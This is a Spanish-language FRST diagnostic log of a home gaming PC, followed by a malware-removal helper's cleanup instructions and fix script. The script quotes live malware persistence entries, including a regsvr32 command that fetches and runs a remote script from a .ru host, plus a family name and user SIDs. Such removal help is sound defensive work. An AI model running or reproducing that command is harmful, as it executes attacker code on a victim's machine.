FirewallRules: [{AC0AB0E1-512E-4FA0-AFB0-88FEAB7DBB8A}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [TCP Query User{B9206133-DE27-4228-95A7-0011F165747D}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{7A9A70EE-3D37-4554-AF4F-88827A946410}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{8A3C1318-8B40-403D-ACF7-237DA2AABC78}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [UDP Query User{C2F198D1-38BF-4B70-A00C-59073C44B99A}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [TCP Query User{BB6C1793-D505-4156-BF7C-44AA81CF0711}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [UDP Query User{E40546E9-EFB2-4C2E-9DD1-F46BA7C3EFF1}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [TCP Query User{51BC5DE6-434E-4374-927A-7C4B7F4D6E2E}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [UDP Query User{D83BA905-0A2E-4671-A098-AB513C5AF9C4}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [TCP Query User{7D14712A-D40E-4C4C-891B-7ECC745A6F20}C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [UDP Query User{E9CCF025-B6D4-49FE-8BB1-9DB454B02F51}C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [TCP Query User{30ED4585-638A-49AA-B805-1C77B86BEDDF}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{D35A1BDA-FFEB-44E9-8347-220AE6105DAC}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{1EAB70AF-D066-4767-ADCE-772024C20D56}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [UDP Query User{FB2593F0-E236-41D5-B4DC-0EF8ED94DD70}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [TCP Query User{557B22A5-A1E1-4091-9E9A-08198F3A48EB}C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{A8614DE1-4000-47ED-8AA8-B4C20CD5091F}C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{0492F1DA-2552-4AEE-B8DB-CB56494254CB}C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [UDP Query User{4696A47D-283B-43B6-88EE-31158FF5D770}C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [TCP Query User{51A1C049-CA80-46E3-B984-3CE89FF9413A}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Block) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [UDP Query User{43F840FA-25C1-4941-BB0F-9D9A51B666A0}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Block) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [TCP Query User{46EE030B-7A57-4E3F-AB8B-9F0DBB3110AC}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [UDP Query User{D653C05C-F715-45BF-BE04-7DF15D930FA2}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [{FBBEBCD5-A2F7-4A06-B4E0-1CC8755C1FE8}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{AFD82A99-09A1-40A0-AC23-23AEBAD196FE}C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe] => (Allow) C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe Ningún archivo
FirewallRules: [UDP Query User{533C26DC-9F35-4FC6-966D-68DEF983A7A8}C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe] => (Allow) C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe Ningún archivo
FirewallRules: [TCP Query User{09013516-0F08-4C86-89EC-792743B3C402}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{C5723237-617D-487F-AA6B-1051735D0E52}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [TCP Query User{6183A9D7-F63B-4886-B59E-69A31228E3BC}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_121\bin\javaw.exe Ningún archivo
FirewallRules: [UDP Query User{54AE04C6-B40D-4130-979F-B531E5C8EDDF}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_121\bin\javaw.exe Ningún archivo
FirewallRules: [TCP Query User{EB69B0BF-CEBA-4A76-A71B-5B54873F6315}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{F36ED7B7-BE13-4F27-B4D4-7AC9C3F80504}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [{460BBF5E-3754-445B-8505-5CBE6E1021D6}] => (Allow) C:\Program Files\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{E814B573-DA37-49A5-83BD-CE5E05C0DCCC}] => (Allow) C:\Program Files\Elsword\data\x2.exe Ningún archivo
FirewallRules: [TCP Query User{1696113F-1966-4FC3-B829-3B234A7FD8E6}C:\program files\java\jre1.8.0_131\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_131\bin\javaw.exe Ningún archivo
FirewallRules: [UDP Query User{F4F3BE95-61E7-4D15-840E-DCD853946D26}C:\program files\java\jre1.8.0_131\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_131\bin\javaw.exe Ningún archivo
FirewallRules: [TCP Query User{637D3EA8-C90E-4DF9-A58E-D23295AB44E9}C:\kaybo\gunz ultra\gunzrun.exe] => (Allow) C:\kaybo\gunz ultra\gunzrun.exe Ningún archivo
FirewallRules: [UDP Query User{F7CF63A3-269B-4561-86AD-C2662D9EEE05}C:\kaybo\gunz ultra\gunzrun.exe] => (Allow) C:\kaybo\gunz ultra\gunzrun.exe Ningún archivo
FirewallRules: [{E27126AC-A01E-4EA3-B035-9736657180B7}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [{7AB9F7C9-0BAF-45D6-9BE3-0CBC5A30A82D}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [TCP Query User{A3B1ADA2-95B3-438B-8E54-9E9F940CAB9D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{F5045B09-7686-438C-9E80-762ECB7B8BE7}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{AAA550EE-3077-4845-B4D5-7762BB872C3D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{D8F93572-717C-408E-BA54-9BEDE5B0303A}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{2A6E4636-3DF1-4590-9201-2899EA3D816A}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{AC5587DE-29AA-4F28-87C6-A0375B02A192}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{36CA106A-8FE5-4816-A362-11330B441CC0}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe] => (Block) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{84437487-7B69-45DE-968A-0F53DF5EBA95}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe] => (Block) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{9949CAE6-B7DA-4860-A8DC-F2109C62E003}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{BEFE0BA9-83CA-467F-A948-E40DF9FF7FF0}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{AB50A785-40D0-4058-8C6D-A4759B265D94}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{EF6E007E-7365-40BD-A4F2-7886E791BED5}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{F842DFF2-F727-437F-8F21-5AF7983A5B8D}C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe] => (Allow) C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe Ningún archivo
FirewallRules: [UDP Query User{6F5F8AB8-976F-41A2-A350-104515B0CB5B}C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe] => (Allow) C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe Ningún archivo
FirewallRules: [TCP Query User{25A2BA8A-28C5-4E9B-A6EC-0E14FA44696A}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{FC10D8A2-84A6-486E-9B44-4D429630E79C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{EC824BA9-E1C5-4845-9D9F-CEAAC0D6906D}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (Universe Gamers) [Archivo no firmado]
FirewallRules: [UDP Query User{FBFA65E9-D662-4EA6-94C8-5B65E28D736F}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (Universe Gamers) [Archivo no firmado]
FirewallRules: [TCP Query User{531C0145-8767-4816-8BE5-4C6E60C0DC16}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{411A3610-0A5E-4608-BD9C-CC136419CDAC}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{A622F54E-0B36-4531-835B-F26799ACC2F9}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{61240510-5F38-4C6A-A5EB-65A65617A4C1}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{BB08D777-19BC-4D75-B0A8-F49383F4EBC4}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{F1C0A4E3-114D-4026-9732-049EA38E069C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{1CAAE91B-4B4F-413E-BBF0-82CDA598D3DA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{47706439-E403-4C7D-9EDE-D1344A1F233C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{2A5A7E4D-7749-4A93-A1AB-EF237471FA8B}C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe] => (Allow) C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe Ningún archivo
FirewallRules: [UDP Query User{EC88AD74-D45F-4E8D-A40B-1C0CC426A16F}C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe] => (Allow) C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe Ningún archivo
FirewallRules: [TCP Query User{7F91224D-8E51-4F55-9F4D-B608B29C4924}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{EB15D02D-72EA-4DD6-ACFE-4642784E48AA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{B3269DA9-6177-4678-B55E-C9B931C1229C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{2FFF9BF0-13C8-42B3-A231-6751376620F7}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{8745764A-BC83-4F55-9171-A5982B40232C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{989FF411-E4ED-4D70-9E3C-790F16DC0BA3}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{04C22F37-9603-465F-815E-37F38486F1DA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{B89B45E2-2A53-4ED7-B129-917471B6306E}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{B1524B90-B864-4AFD-B78E-E5F599B537E8}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{E13FD752-7E41-4C11-9987-4358AE0CEC63}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{8F976A90-C687-4FD6-9141-889CAD57FB2D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{03F47DD5-648D-4556-909F-25D7EE7A7C37}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{E53A12F1-9811-40B3-9BA4-93F39D80DB23}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{3C8F5781-51E6-489A-9E90-2D88477F13BD}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe Ningún archivo
FirewallRules: [{EAE3E187-9D04-49F4-A4B0-853596BFBFA5}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{AFEA90B5-FA67-43D1-8509-81A6255DD64C}] => (Allow) C:\Program Files\BlueStacks\HD-Player.exe Ningún archivo
FirewallRules: [{2C916BF5-DB28-4C44-8AFD-D827448F82BB}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{7DE87355-A05F-410A-8AAE-AD72211BAAE8}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{1F09387B-EAC1-494C-9728-5D3C7724F953}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{DC393E86-4829-46F1-B277-E2E6F1B3B57D}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)

==================== Puntos de Restauración =========================

20-04-2020 14:28:31 Punto de control programado
21-04-2020 10:15:13 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212
21-04-2020 10:16:09 Installed Intel® Processor Identification Utility

==================== Dispositivos defectuosos en el Administrador de dispositivos ============

Name: Security Processor Loader Driver
Description: Security Processor Loader Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: spldr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Errores del registro de eventos: ========================

Errores de aplicación:
==================
Error: (04/22/2020 11:47:48 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (04/22/2020 11:42:57 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (04/22/2020 11:41:13 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.

Error: (04/22/2020 11:41:12 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9

Error: (04/22/2020 11:40:06 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (04/22/2020 11:38:25 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.

Error: (04/22/2020 11:38:25 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9

Error: (04/22/2020 11:26:57 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.


Errores del sistema:
=============
Error: (04/22/2020 11:47:46 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1084" al intentar iniciar el servicio VSS con argumentos "" para ejecutar el servidor:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1084" al intentar iniciar el servicio WSearch con argumentos "" para ejecutar el servidor:
{9E175B6D-F52A-11D8-B9A5-505054503030}


Windows Defender:
===================================
Date: 2020-04-16 10:04:25.437
Description: 
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{D89403F0-B93D-475E-9BE2-D2E52245BCDF}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:FamiliaLandaeta\Familia Landaeta

==================== Información de la memoria =========================== 

BIOS: American Megatrends Inc. 6.07 03/21/2011
Placa base: FOXCONN 2A8C
Procesador: Pentium(R) Dual-Core CPU E5800 @ 3.20GHz
Porcentaje de memoria en uso: 72%
RAM física total: 2013.24 MB
RAM física disponible: 554.35 MB
Virtual total: 4026.48 MB
Virtual disponible: 2630.89 MB

==================== Unidades ================================

Drive c: () (Fixed) (Total:148.95 GB) (Free:44.16 GB) NTFS

\\?\Volume{459fd2d9-792a-11e6-a962-806e6f6e6963}\ (Reservado para el sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS

==================== MBR & Tabla de particiones ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: F362F362)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=149 GB) - (Type=07 NTFS)

==================== Final  Addition.txt =======================

First of all, uninstall CCleaner.

Good… now follow these steps. VERY important: make a backup of the registry:

  • To do this, download Delfix to your desktop.

  • Double-click to run it. (If you use Windows Vista/7/8 or 10, right-click and select "Run as administrator".)

  • Attention: now check only the Registry Backup box, NOT the others.

  • Click Run.

The report (Delfix.txt) will open; save it in case it is needed and close the tool.


On the computer, with all other programs closed:

Start >>> Run >>> type notepad.exe.

Now copy and paste the following into Notepad:


Start
CreateRestorePoint:
CloseProcesses:

ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\MountPoints2: {3ce42c48-38d5-11e8-849d-78acc0bd591b} - E:\Setup.exe
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATENCIÓN
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk [2020-04-22]
ShortcutTarget: xiwlwq.lnk -> C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe (Microsoft Windows -> Microsoft Corporation)
Task: {AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA} - System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => C:\Windows\system32\pcalua.exe -a C:\Users\FAMILI~1\AppData\Local\Temp\jre-8u161-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATENCIÓN
